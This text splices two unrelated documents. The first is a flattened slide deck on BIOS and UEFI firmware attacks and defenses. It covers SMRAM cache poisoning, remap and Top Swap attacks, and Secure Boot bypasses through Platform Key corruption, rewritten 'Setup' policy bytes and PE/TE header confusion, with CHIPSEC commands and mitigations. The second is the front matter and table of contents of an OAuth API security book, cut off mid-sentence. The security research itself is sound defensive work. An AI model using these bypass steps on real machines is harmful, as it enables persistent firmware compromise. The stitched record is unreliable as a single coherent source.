0 Compatible SMM Space: Unlocked 0xBFFFF Compatible SMRAM (CSEG) Non-SMM access to CSEG is decoded to DRAM where SMI handlers can be modified 0xA0000 Non SMM access SMRAMC [D_LCK] = 0 SMRAMC [D_OPEN] = 1 Is Compatible SMRAM Locked? [+] imported chipsec.modules.common.smm [x][ ================================================================= [x][ Module: SMM memory (SMRAM) Lock [x][ ================================================================= [*] SMRAM register = 0x1A ( D_LCK = 1, D_OPEN = 0 ) [+] PASSED: SMRAM is locked Problems With HW Configuration/Protections • CPU executes from cache if memory type is cacheable • Ring0 exploit can make SMRAM cacheable (variable MTRR) • Ring0 exploit can then populate cache-lines at SMBASE with SMI exploit code (ex. modify SMBASE) and trigger SMI • CPU upon entering SMM will execute SMI exploit from cache • Attacking SMM Memory via Intel Cache Poisoning • Getting Into the SMRAM: SMM Reloaded • CPU System Management Range Registers (SMRR) forcing UC and blocking access to SMRAM when CPU is not in SMM • BIOS has to enable SMRR • chipsec_main –-module common.smrr SMRAM “Cache Poisoning” Attacks Is SMRAM Exposed To Cache Poisoning Attack? [*] running module: chipsec.modules.common.smrr [x][ ======================================================================= [x][ Module: CPU SMM Cache Poisoning / SMM Range Registers (SMRR) [x][ ======================================================================= [+] OK. SMRR are supported in IA32_MTRRCAP_MSR [*] Checking SMRR Base programming.. [*] IA32_SMRR_BASE_MSR = 0x00000000BD000006 BASE = 0xBD000000 MEMTYPE = 6 [+] SMRR Memtype is WB [+] OK so far. SMRR Base is programmed [*] Checking SMRR Mask programming.. [*] IA32_SMRR_MASK_MSR = 0x00000000FF800800 MASK = 0xFF800000 VLD = 1 [+] OK so far. SMRR are enabled in SMRR_MASK MSR [*] Verifying that SMRR_BASE/MASK have the same values on all logical CPUs.. [CPU0] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU1] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU2] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU3] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [+] OK so far. SMRR MSRs match on all CPUs [+] PASSED: SMRR protection against cache attack seems properly configured Problems With HW Configuration/Protections • Remap Window is used to reclaim DRAM range below 4Gb “lost” for Low MMIO • Defined by REMAPBASE/REMAPLIMIT registers in Memory Controller PCIe config. space • MC remaps Reclaim Window access to DRAM below 4GB (above “Top Of Low DRAM”) • If not locked, OS malware can reprogram target of reclaim to overlap with SMRAM • Preventing & Detecting Xen Hypervisor Subversions • BIOS has to lock down Memory Map registers including REMAP*, TOLUD/TOUUD SMRAM Memory Remapping/Reclaim Attack Memory Remapping: Normal Memory Map Memory Reclaim/Remap Range Low MMIO Range TOLUD 4GB SMRAM REMAPBASE REMAPLIMIT Access is remapped to DRAM range ‘lost’ to MMIO (memory reclaimed) Access Memory Remapping: SMRAM Remapping Attack Memory Reclaim/Remap Range Low MMIO Range TOLUD 4GB SMRAM REMAPBASE REMAPLIMIT Target range of memory reclaim changed to SMRAM Access Problems With HW Configuration/Protections • “Top Swap” feature allows fault-tolerant update of BIOS boot block • Enabled by BUC[TS] in Root Complex MMIO range • When enabled, chipset flips A16-A20 address bits (depending on the size of boot block) when CPU fetches reset vector on reboot • Thus CPU executes from 0xFFFEFFF0 inside “backup” boot block rather than from 0xFFFFFFF0 • What if malware enables Top Swap? • BIOS Boot Hijacking and VMware Vulnerabilities Digging • BIOS has to lock down Top Swap configuration (BIOS Interface Lock in General Control & Status register) & protect top swap range in SPI • chipsec_main --module common.bios_ts BIOS Top Swap Attack Is BIOS Interface Locked? [+] imported chipsec.modules.common.bios_ts [x][ ======================================================================= [x][ Module: BIOS Interface Lock and Top Swap Mode [x][ ======================================================================= [*] RCBA General Config base: 0xFED1F400 [*] GCS (General Control and Status) register = 0x00000021 [10] BBS (BIOS Boot Straps) = 0x0 [00] BILD (BIOS Interface Lock-Down) = 1 [*] BUC (Backed Up Control) register = 0x00000000 [00] TS (Top Swap) = 0 [*] BC (BIOS Control) register = 0x2A [04] TSS (Top Swap Status) = 0 [*] BIOS Top Swap mode is disabled [+] PASSED: BIOS Interface is locked (including Top Swap Mode) BIOS Attack Surface: SMI Handlers System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB Code fetch in SMM Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB 0xF8070: payload 0F000:08070 = 0xF8070 PA Code fetch in SMM Legacy SMI Handlers Calling Out of SMRAM • OS level exploit stores payload in F-segment below 1MB (0xF8070 Physical Address) • Exploit has to also reprogram PAM for F-segment • Then triggers “SW SMI” via APMC port (I/O 0xB2) • SMI handler does CALL 0F000:08070 in SMM • BIOS SMM Privilege Escalation Vulnerabilities (14 issues in just one SMI Handler) • System Management Mode Design and Security Issues Branch Outside of SMRAM Function Pointers Outside of SMRAM (DXE SMI) Phys Memory SMRAM mov ACPINV+x, %rax call *0x18(%rax) ACPI NV Area payload 1. Read function pointer from ACPI NVS memory (outside SMRAM) Pointer to payload 2. Call function pointer (payload outside SMRAM) Attacking Intel BIOS BIOS Attack Surface: UEFI Secure Boot System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Secure Boot Key Hierarchy Platform Key (PK) Verifies KEKs Platform Vendor’s Cert Key Exchange Keys (KEKs) Verify db and dbx Earlier rev’s: verifies image signatures Authorized Database (db) Forbidden Database (dbx) X509 certificates, SHA1/SHA256 hashes of allowed & revoked images Earlier revisions: RSA-2048 public keys, PKCS#7 signatures Platform Key (Root Key) has to be Valid PK variable exists in NVRAM? Yes. Set SetupMode variable to USER_MODE No. Set SetupMode variable to SETUP_MODE SecureBootEnable variable exists in NVRAM? Yes SecureBootEnable variable is SECURE_BOOT_ENABLE and SetupMode variable is USER_MODE? Set SecureBoot variable to ENABLE Else? Set SecureBoot variable to DISABLE No SetupMode is USER_MODE? Set SecureBoot variable to ENABLE SetupMode is SETUP_MODE? Set SecureBoot variable to DISABLE First Public Windows 8 Secure Boot Bypass A Tale Of One Software Bypass Of Windows 8 Secure Boot Platform Key in NVRAM Can Be Modified Corrupt Platform Key EFI variable in NVRAM Name (“PK”) or Vendor GUID {8BE4DF61-93CA-11D2- AA0D-00E098032B8C} Recall that AutenticatedVariableService DXE driver enters Secure Boot SETUP_MODE when correct “PK” EFI variable cannot be located in EFI NVRAM Main volatile SecureBoot variable is then set to DISABLE DXE ImageVerificationLib then assumes Secure Boot is off and skips Secure Boot checks Generic exploit, independent of the platform/vendor 1 bit modification! PK Mod: Before and After Exploit Programs SPI Controller & Modifies SPI Flash Signed BIOS Update Modify Secure Boot FW or config in ROM Then Installs UEFI Bootkit on ESP Signed BIOS Update Install UEFI Bootkit Modified FW Doesn’t Enforce Secure Boot Signed BIOS Update Demo (Bypassing Secure Boot by Corrupting Platform Key in SPI) Turn On/Off Secure Boot in BIOS Setup How to Disable Secure Boot? SecureBootEnable UEFI Variable When turning ON/OFF Secure Boot, it should change Hmm.. but there is no SecureBootEnable variable Where does the BIOS store Secure Boot Enable flag? Should be NV somewhere in SPI Flash.. Just dump SPI flash with Secure Boot ON and OFF Then compare two SPI flash images Yeah.. Good Luck With That ;( There’s A Better Way.. Secure Boot On Secure Boot Off Secure Boot On Secure Boot Off Secure Boot Disable is Really in Setup! chipsec_util.py spi dump spi.bin chipsec_util.py uefi nvram spi.bin chipsec_util.py decode spi.bin Demo (Attack Disabling Secure Boot) Secure Boot: Image Verification Policies DxeImageVerificationLib defines policies applied to different types of images and on security violation IMAGE_FROM_FV (ALWAYS_EXECUTE), IMAGE_FROM_FIXED_MEDIA, IMAGE_FROM_REMOVABLE_MEDIA, IMAGE_FROM_OPTION_ROM ALWAYS_EXECUTE, NEVER_EXECUTE, ALLOW_EXECUTE_ON_SECURITY_VIOLATION DEFER_EXECUTE_ON_SECURITY_VIOLATION DENY_EXECUTE_ON_SECURITY_VIOLATION QUERY_USER_ON_SECURITY_VIOLATION SecurityPkg\Library\DxeImageVerificationLib http://sourceforge.net/apps/mediawiki/tianocore/index.php?title=SecurityPkg Secure Boot: Image Verification Policies Image Verification Policy? (IMAGE_FROM_FV) ALWAYS_EXECUTE? EFI_SUCCESS NEVER_EXECUTE? EFI_ACCESS_DENIED Storing Image Verification Policies in Setup Read ‘Setup’ UEFI variable and look for sequences 04 04 04, 00 04 04, 05 05 05, 00 05 05 We looked near Secure Boot On/Off Byte! Modify bytes corresponding to policies to 00 (ALWAYS_EXECUTE) then write modified ‘Setup’ variable Modifying Image Verification Policies [CHIPSEC] Reading EFI variable Name='Setup' GUID={EC87D643-EBA4-4BB5-A1E5- 3F3E36B20DA9} from 'Setup_orig.bin' via Variable API.. EFI variable: Name : Setup GUID : EC87D643-EBA4-4BB5-A1E5-3F3E36B20DA9 Data : .. 01 01 01 00 00 00 00 01 01 01 00 00 00 00 00 00 | 00 00 00 00 00 00 01 01 00 00 00 04 04 | [CHIPSEC] (uefi) time elapsed 0.000 [CHIPSEC] Writing EFI variable Name='Setup' GUID={EC87D643-EBA4-4BB5-A1E5- 3F3E36B20DA9} from 'Setup_policy_exploit.bin' via Variable API.. Writing EFI variable: Name : Setup GUID : EC87D643-EBA4-4BB5-A1E5-3F3E36B20DA9 Data : .. 01 01 01 00 00 00 00 01 01 01 00 00 00 00 00 00 | 00 00 00 00 00 00 01 01 00 00 04 00 00 | [CHIPSEC] (uefi) time elapsed 0.203 OptionRomPolicy FixedMediaPolicy RemovableMediaPolicy Allows Bypassing Secure Boot Issue was co-discovered with Corey Kallenberg, Xeno Kovah, John Butterworth and Sam Cornwell from MITRE All Your Boot Are Belong To Us, Setup for Failure: Defeating SecureBoot Demo (Bypassing Secure Boot via Image Verification Policies) How To Avoid These? 1. Do not store critical Secure Boot configuration in UEFI variables accessible to potentially compromised OS kernel or boot loader Remove RUNTIME_ACCESS attribute (reduce access permissions) Use authenticated variable where required by UEFI Spec Disabling Secure Boot requires physically present user 2. Set Image Verification Policies to secure values Use Platform Configuration Database (PCD) for the policies Using ALWAYS_EXECUTE,ALLOW_EXECUTE_* is a bad idea Especially check PcdOptionRomImageVerificationPolicy Default should be NEVER_EXECUTE or DENY_EXECUTE Recap on Image Verification Handler SecureBoot EFI variable doesn’t exist or equals to SECURE_BOOT_MODE_DISABLE? EFI_SUCCESS File is not valid PE/COFF image? EFI_ACCESS_DENIED SecureBootEnable NV EFI variable doesn’t exist or equals to SECURE_BOOT_DISABLE? EFI_SUCCESS SetupMode NV EFI variable doesn’t exist or equals to SETUP_MODE? EFI_SUCCESS EFI Executables Any EFI executables other then PE/COFF? YES! – EFI Byte Code (EBC), Terse Executable (TE) But EBC image is a 32 bits PE/COFF image wrapping byte code. No luck Terse Executable format: In an effort to reduce image size, a new executable image header (TE) was created that includes only those fields from the PE/COFF headers required for execution under the PI Architecture. Since this header contains the information required for execution of the image, it can replace the PE/COFF headers from the original image. http://wiki.phoenix.com/wiki/index.php/Terse_Executable_Format TE is not PE/COFF TE differs from PE/COFF only with header: PE/TE Header Handling by the BIOS Decoded UEFI BIOS image from SPI Flash PE/TE Header Handling by the BIOS CORE_DXE.efi: PE/TE Header Confusion ExecuteSecurityHandler calls GetFileBuffer to read an executable file. GetFileBuffer reads the file and checks it to have a valid PE header. It returns EFI_LOAD_ERROR if executable is not PE/COFF. ExecuteSecurityHandler returns EFI_SUCCESS (0) in case GetFileBuffer returns an error Signature Checks are Skipped! PE/TE Header Confusion BIOS allows running TE images w/o signature check Malicious PE/COFF EFI executable (bootkit.efi) Convert executable to TE format by replacing PE/COFF header with TE header Replace OS boot loaders with resulting TE EFI executable Signature check is skipped for TE EFI executable Executable will load and patch original OS boot loader Demo (Secure Boot Bypass via PE/TE Header Confusion) Other Secure Boot Problems • CSM Module Allows Legacy On UEFI Based Firmware • Allows Legacy OS Boot Through [Unsigned] MBR • Allows Loading Legacy [Unsigned] Option ROMs • Once CSM is ON, UEFI BIOS dispatches legacy OROMs then boots MBR • CSM Cannot Be Turned On When Secure Boot is Enabled • CSM can be turned On/Off in BIOS Setup Options • But cannot select “CSM Enabled” when Secure Boot is On CSM Enabled with Secure Boot • Force CSM to Disabled if Secure Boot is Enabled • But don’t do that only in Setup HII • Implement isCSMEnabled() function always returning FALSE in Secure Boot • Never fall back to legacy boot through MBR if Secure Boot verification of UEFI executable fails Mitigations Clearing Platform Key… from Software “Clear Secure Boot keys” takes effect after reboot Switch that triggers clearing of Secure Boot keys is in UEFI Variable (happens to be in ‘Setup’ variable) But recall that Secure Boot is OFF without Platform Key PK is cleared Secure Boot is Disabled Install Default Keys… From Where? Default Secure Boot keys can be restored [When there’s no PK] Switch that triggers restore of Secure Boot keys to their default values is in UEFI Variable (happens to be in ‘Setup’) Nah.. Default keys are protected. They are in FV But we just added 9 hashes to the DBX blacklist Did You Notice Secure Boot Config. Changed? The system protects Secure Boot configuration from modification but has an implementation bug Firmware stores integrity of Secure Boot settings & checks on reboot Upon integrity mismatch, beeps 3 times, waits timeout then… Keeps booting with modified Secure Boot settings BIOS Attack Surface: Handling Sensitive Data System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Handling Sensitive Data • BIOS and Pre-OS applications store keystrokes in legacy BIOS keyboard buffer in BIOS data area (at PA = 0x41E) • BIOS, HDD passwords, Full-Disk Encryption PINs etc. • Some BIOS’es didn’t clear keyboard buffer • Bypassing Pre-Boot Authentication Passwords • chipsec_main -m common.bios_kbrd_buffer Pre-Boot Passwords Exposure Secrets in the Keyboard Buffer? [*] running module: chipsec.modules.common.bios_kbrd_buffer [x][ ======================================================================= [x][ Module: Pre-boot Passwords in the BIOS Keyboard Buffer [x][ ======================================================================= [*] Keyboard buffer head pointer = 0x3A (at 0x41A), tail pointer = 0x3A (at 0x41C) [*] Keyboard buffer contents (at 0x41E): 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 | 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 | [-] Keyboard buffer tail points inside the buffer (= 0x3A) It may potentially expose lengths of pre-boot passwords. Was your password 15 characters long? [*] Checking contents of the keyboard buffer.. [+] PASSED: Keyboard buffer looks empty. Pre-boot passwords don't seem to be exposed * Better check from EFI shell as OS/pre-boot app might have cleared the keyboard buffer BIOS Attack Surface: SMI Handlers System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. What? More Issues With SMI Handlers ? • Coordination Is Ongoing With Independent BIOS Vendors and Platform Manufacturers Multiple UEFI BIOS SMI Handler Vulnerabilities Do BIOS Attacks Require Kernel Privileges? To attack BIOS, exploit needs access to HW: PCIe config, I/O ports, physical memory, etc. So, generally, yes. Kernel privileges are required.. Unless Suitable Kernel Driver Already Signed Legitimate signed OS kernel driver which can do all this on behalf of a user mode app (as a confused deputy). We found suitable driver signed for Windows 64bit versions (co- discovered with researchers from MITRE) Ref: BIOS Security Guidelines / Best Practices CHIPSEC framework: https://github.com/chipsec/chipsec MITRE Copernicus tool NIST BIOS Protection Guidelines (SP 800-147 and SP 800-147B) IAD BIOS Update Protection Profile Windows Hardware Certification Requirements UEFI Forum sub-teams: USST (UEFI Security) and PSST (PI Security) UEFI Firmware Security Best Practices BIOS Flash Regions UEFI Variables in Flash (UEFI Variable Usage Technical Advisory) Capsule Updates SMRAM Secure Boot Ref: BIOS Security Research Security Issues Related to Pentium System Management Mode (CSW 2006) Implementing and Detecting an ACPI BIOS Rootkit (BlackHat EU 2006) Implementing and Detecting a PCI Rootkit (BlackHat DC 2007) Programmed I/O accesses: a threat to Virtual Machine Monitors? (PacSec 2007) Hacking the Extensible Firmware Interface (BlackHat USA 2007) BIOS Boot Hijacking And VMWare Vulnerabilities Digging (PoC 2007) Bypassing pre-boot authentication passwords (DEF CON 16) Using SMM for "Other Purposes“ (Phrack65) Persistent BIOS Infection (Phrack66) A New Breed of Malware: The SMM Rootkit (BlackHat USA 2008) Preventing & Detecting Xen Hypervisor Subversions (BlackHat USA 2008) A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers (Phrack66) Attacking Intel BIOS (BlackHat USA 2009) Getting Into the SMRAM: SMM Reloaded (CSW 2009, CSW 2009) Attacking SMM Memory via Intel Cache Poisoning (ITL 2009) BIOS SMM Privilege Escalation Vulnerabilities (bugtraq 2009) System Management Mode Design and Security Issues (IT Defense 2010) Analysis of building blocks and attack vectors associated with UEFI (SANS Institute) (U)EFI Bootkits (BlackHat USA 2012 @snare, SaferBytes 2012 Andrea Allievi, HITB 2013) Evil Maid Just Got Angrier (CSW 2013) A Tale of One Software Bypass of Windows 8 Secure Boot (BlackHat USA 2013) BIOS Chronomancy (NoSuchCon 2013, BlackHat USA 2013, Hack.lu 2013) Defeating Signed BIOS Enforcement (PacSec 2013, Ekoparty 2013) UEFI and PCI BootKit (PacSec 2013) Meet ‘badBIOS’ the mysterious Mac and PC malware that jumps airgaps (#badBios) All Your Boot Are Belong To Us (CanSecWest 2014 Intel and MITRE) Setup for Failure: Defeating Secure Boot (Syscan 2014) Setup for Failure: More Ways to Defeat Secure Boot (HITB 2014 AMS) Analytics, and Scalability, and UEFI Exploitation (INFILTRATE 2014) PC Firmware Attacks, Copernicus and You (AusCERT 2014) Extreme Privilege Escalation (BlackHat USA 2014) THANK YOU! BACKUP: Platform Firmware / BIOS Forensics With CHIPSEC framework (https://github.com/chipsec/chipsec) Forensics Functionality Live system firmware analysis (BIOS malware can defeat SW acquisition) chipsec_util spi info chipsec_util spi dump rom.bin chipsec_util spi read 0x700000 0x100000 bios.bin chipsec_util uefi var-list chipsec_util uefi var-read db D719B2CB-3D3A-4596- A3BC-DAD00E67656F db.bin Offline system firmware analysis chipsec_util uefi keys PK.bin chipsec_util uefi nvram vss bios.bin chipsec_util uefi decode rom.bin chipsec_util decode rom.bin Manual Access to HW Resources chipsec_util msr 0x200 chipsec_util mem 0x0 0x41E 0x20 chipsec_util pci enumerate chipsec_util pci 0x0 0x1F 0x0 0xDC byte chipsec_util io 0x61 byte chipsec_util mmcfg 0 0x1F 0 0xDC 1 0x1 chipsec_util mmio list chipsec_util cmos dump chipsec_util ucode id chipsec_util smi 0x01 0xFF chipsec_util idt 0 chipsec_util cpuid 1 chipsec_util spi read 0x700000 0x100000 bios.bin chipsec_util decode spi.bin chipsec_util uefi var-list ..
pdf
Advanced API Security OAuth 2.0 and Beyond — Second Edition — Prabath Siriwardena Advanced API Security OAuth 2.0 and Beyond Second Edition Prabath Siriwardena Advanced API Security: OAuth 2.0 and Beyond ISBN-13 (pbk): 978-1-4842-2049-8 ISBN-13 (electronic): 978-1-4842-2050-4 https://doi.org/10.1007/978-1-4842-2050-4 Copyright © 2020 by Prabath Siriwardena This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights. While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein. Managing Director, Apress Media LLC: Welmoed Spahr Acquisitions Editor: Jonathan Gennick Development Editor: Laura Berendson Coordinating Editor: Jill Balzano Cover image designed by Freepik (www.freepik.com) Distributed to the book trade worldwide by Springer Science+Business Media New York, 233 Spring Street, 6th Floor, New York, NY 10013. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer- sbm.com, or visit www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a Delaware corporation. For information on translations, please e-mail rights@apress.com, or visit http://www.apress.com/ rights-permissions. Apress titles may be purchased in bulk for academic, corporate, or promotional use. eBook versions and licenses are also available for most titles. For more information, reference our Print and eBook Bulk Sales web page at http://www.apress.com/bulk-sales. Any source code or other supplementary material referenced by the author in this book is available to readers on GitHub via the book’s product page, located at www.apress.com/9781484220498. For more detailed information, please visit http://www.apress.com/source-code. Printed on acid-free paper Prabath Siriwardena San Jose, CA, USA This book is dedicated to my sister Deepani, who backed me all the time! v Chapter 1: APIs Rule!................................................................................................ 1 API Economy 1 Amazon 3 Salesforce 5 Uber 5 Facebook 6 Netflix 7 Walgreens 8 Governments 9 IBM Watson 9 Open Banking 10 Healthcare 10 Wearables 11 Business Models 12 The API Evolution 13 API Management 20 The Role of APIs in Microservices 25 Summary 32 Chapter 2: Designing Security for APIs .................................................................. 33 Trinity of Trouble 34 Design Challenges 37 Table of Contents About the Author .....................................................................................................xv Acknowledgments .................................................................................................xvii Introduction ............................................................................................................xix vi User Experience 38 Performance 39 Weakest Link 40 Defense in Depth 41 Insider Attacks 42 Security by Obscurity 44 Design Principles 45 Least Privilege 45 Fail-Safe Defaults 46 Economy of Mechanism 48 Complete Mediation 49 Open Design 49 Separation of Privilege 51 Least Common Mechanism 52 Psychological Acceptability 53 Security Triad 54 Confidentiality 54 Integrity 56 Availability 57 Security Control 59 Authentication 59 Authorization 62 Nonrepudiation 64 Auditing 65 Summary 65 Chapter 3: Securing APIs with Transport Layer Security (TLS) .............................. 69 Setting Up the Environment 69 Deploying Order API 71 Securing Order API with Transport Layer Security (TLS) 74 Protecting Order API with Mutual TLS 76 Table of ConTenTs vii Running OpenSSL on Docker 78 Summary 79 Chapter 4: OAuth 2.0 Fundamentals ....................................................................... 81 Understanding OAuth 20 81 OAuth 20 Actors 83 Grant Types 84 Authorization Code Grant Type 85 Implicit Grant Type 88 Resource Owner Password Credentials Grant Type 90 Client Credentials Grant Type 91 Refresh Grant Type 92 How to Pick the Right Grant Type? 93 OAuth 20 Token Types 94 OAuth 20 Bearer Token Profile 94 OAuth 20 Client Types 96 JWT Secured Authorization Request (JAR) 97 Pushed Authorization Requests (PAR) 99 Summary 101 Chapter 5: Edge Security with an API Gateway .................................................... 103 Setting Up Zuul API Gateway 103 Running the Order API 104 Running the Zuul API Gateway 105 What Happens Underneath? 107 Enabling TLS for the Zuul API Gateway 107 Enforcing OAuth 20 Token Validation at the Zuul API Gateway 109 Setting Up an OAuth 20 Security Token Service (STS) 110 Testing OAuth 20 Security Token Service (STS) 112 Setting Up Zuul API Gateway for OAuth 20 Token Validation 114 Enabling Mutual TLS Between Zuul API Gateway and Order Service 117 Securing Order API with Self-Contained Access Tokens 121 Table of ConTenTs viii Setting Up an Authorization Server to Issue JWT 121 Protecting Zuul API Gateway with JWT 124 The Role of a Web Application Firewall (WAF) 125 Summary 126 Chapter 6: OpenID Connect (OIDC) ........................................................................ 129 From OpenID to OIDC 129 Amazon Still Uses OpenID 20 132 Understanding OpenID Connect 133 Anatomy of the ID Token 134 OpenID Connect Request 139 Requesting User Attributes 142 OpenID Connect Flows 144 Requesting Custom User Attributes 145 OpenID Connect Discovery 146 OpenID Connect Identity Provider Metadata 149 Dynamic Client Registration 151 OpenID Connect for Securing APIs 153 Summary 155 Chapter 7: Message-Level Security with JSON Web Signature ............................ 157 Understanding JSON Web Token (JWT) 157 JOSE Header 158 JWT Claims Set 160 JWT Signature 163 JSON Web Signature (JWS) 167 JWS Compact Serialization 167 The Process of Signing (Compact Serialization) 172 JWS JSON Serialization 174 The Process of Signing (JSON Serialization) 176 Summary 184 Table of ConTenTs ix Chapter 8: Message-Level Security with JSON Web Encryption .......................... 185 JWE Compact Serialization 185 JOSE Header 186 JWE Encrypted Key 191 JWE Initialization Vector 194 JWE Ciphertext 194 JWE Authentication Tag 194 The Process of Encryption (Compact Serialization) 195 JWE JSON Serialization 196 JWE Protected Header 197 JWE Shared Unprotected Header 197 JWE Per-Recipient Unprotected Header 198 JWE Initialization Vector 198 JWE Ciphertext 198 JWE Authentication Tag 199 The Process of Encryption (JSON Serialization) 199 Nested JWTs 201 Summary 210 Chapter 9: OAuth 2.0 Profiles ............................................................................... 211 Token Introspection 211 Chain Grant Type 215 Token Exchange 217 Dynamic Client Registration Profile 220 Token Revocation Profile 225 Summary 226 Chapter 10: Accessing APIs via Native Mobile Apps ............................................ 227 Mobile Single Sign-On (SSO) 227 Login with Direct Credentials 228 Login with WebView 229 Login with a System Browser 230 Table of ConTenTs x Using OAuth 20 in Native Mobile Apps 231 Inter-app Communication 233 Proof Key for Code Exchange (PKCE) 235 Browser-less Apps 237 OAuth 20 Device Authorization Grant 237 Summary 241 Chapter 11: OAuth 2.0 Token Binding ................................................................... 243 Understanding Token Binding 244 Token Binding Negotiation 244 TLS Extension for Token Binding Protocol Negotiation 246 Key Generation 247 Proof of Possession 247 Token Binding for OAuth 20 Refresh Token 249 Token Binding for OAuth 20 Authorization Code/Access Token 251 TLS Termination 254 Summary 255 Chapter 12: Federating Access to APIs ................................................................ 257 Enabling Federation 257 Brokered Authentication 258 Security Assertion Markup Language (SAML) 261 SAML 20 Client Authentication 261 SAML Grant Type for OAuth 20 264 JWT Grant Type for OAuth 20 267 Applications of JWT Grant Type 269 JWT Client Authentication 270 Applications of JWT Client Authentication 271 Parsing and Validating JWT 274 Summary 276 Table of ConTenTs xi Chapter 13: User-Managed Access ....................................................................... 277 Use Cases 277 UMA 20 Roles 279 UMA Protocol 280 Interactive Claims Gathering 284 Summary 286 Chapter 14: OAuth 2.0 Security ............................................................................ 287 Identity Provider Mix-Up 287 Cross-Site Request Forgery (CSRF) 291 Token Reuse 294 Token Leakage/Export 296 Open Redirector 298 Code Interception Attack 300 Security Flaws in Implicit Grant Type 301 Google Docs Phishing Attack 302 Summary 304 Chapter 15: Patterns and Practices ...................................................................... 305 Direct Authentication with the Trusted Subsystem 305 Single Sign-On with the Delegated Access Control 306 Single Sign-On with the Integrated Windows Authentication 308 Identity Proxy with the Delegated Access Control 309 Delegated Access Control with the JSON Web Token 310 Nonrepudiation with the JSON Web Signature 311 Chained Access Delegation 313 Trusted Master Access Delegation 315 Resource Security Token Service (STS) with the Delegated Access Control 316 Delegated Access Control with No Credentials over the Wire 318 Summary 319 Table of ConTenTs xii Appendix A: The Evolution of Identity Delegation ................................................. 321 Direct Delegation vs Brokered Delegation 322 The Evolution 323 Google ClientLogin 325 Google AuthSub 326 Flickr Authentication API 327 Yahoo! Browser–Based Authentication (BBAuth) 327 OAuth 328 Appendix B: OAuth 1.0 .......................................................................................... 331 The Token Dance 331 Temporary-Credential Request Phase 333 Resource-Owner Authorization Phase 335 Token-Credential Request Phase 336 Invoking a Secured Business API with OAuth 10 338 Demystifying oauth_signature 339 Generating the Base String in Temporary-Credential Request Phase 340 Generating the Base String in Token Credential Request Phase 342 Building the Signature 343 Generating the Base String in an API Call 344 Three-Legged OAuth vs Two-Legged OAuth 346 OAuth WRAP 347 Client Account and Password Profile 349 Assertion Profile 350 Username and Password Profile 350 Web App Profile 352 Rich App Profile 353 Accessing a WRAP-Protected API 354 WRAP to OAuth 20 354 Table of ConTenTs xiii Appendix C: How Transport Layer Security Works? ............................................. 355 The Evolution of Transport Layer Security (TLS) 356 Transmission Control Protocol (TCP) 358 How Transport Layer Security (TLS) Works 364 Transport Layer Security (TLS) Handshake 365 Application Data Transfer 374 Appendix D: UMA Evolution .................................................................................. 377 ProtectServe 377 UMA and OAuth 384 UMA 10 Architecture 384 UMA 10 Phases 385 UMA Phase 1: Protecting a Resource 385 UMA Phase 2: Getting Authorization 388 UMA Phase 3: Accessing the Protected Resource 394 UMA APIs 394 Protection API 395 Authorization API 396 Appendix E: Base64 URL Encoding ....................................................................... 397 Appendix F: Basic/Digest Authentication ............................................................. 401 HTTP Basic Authentication 402 HTTP Digest Authentication 406 Appendix G: OAuth 2.0 MAC Token Profile ............................................................ 425 Bearer Token vs MAC Token 427 Obtaining a MAC Token 428 Invoking an API Protected with the OAuth 20 MAC Token Profile 432 Calculating the MAC 433 Table of ConTenTs xiv MAC Validation by the Resource Server 435 OAuth Grant Types and the MAC Token Profile 436 OAuth 10 vs OAuth 20 MAC Token Profile 436 Index ..................................................................................................................... 439 Table of ConTenTs xv About the Author Prabath Siriwardena is an identity evangelist, author, blogger, and VP of Identity Management and Security at WSO2. He has more than 12 years of industry experience in designing and building critical identity and access management (IAM) infrastructure for global enterprises, including many Fortune 100/500 companies. As a technology evangelist, Prabath has published seven books. He blogs on various topics from blockchain, PSD2, GDPR, IAM to microservices security. He also runs a YouTube channel. Prabath has spoken at many conferences, including RSA Conference, KNOW Identity, Identiverse, European Identity Conference, Consumer Identity World USA, API World, API Strategy and Practice Conference, QCon, OSCON, and WSO2Con. He has traveled the world conducting workshops and meetups to evangelize IAM communities. He is the founder of the Silicon Valley IAM User Group, which is the largest IAM meetup in the San Francisco Bay Area. xvii Acknowledgments I would first like to thank Jonathan Gennick, Assistant Editorial Director at Apress, for evaluating and accepting my proposal for this 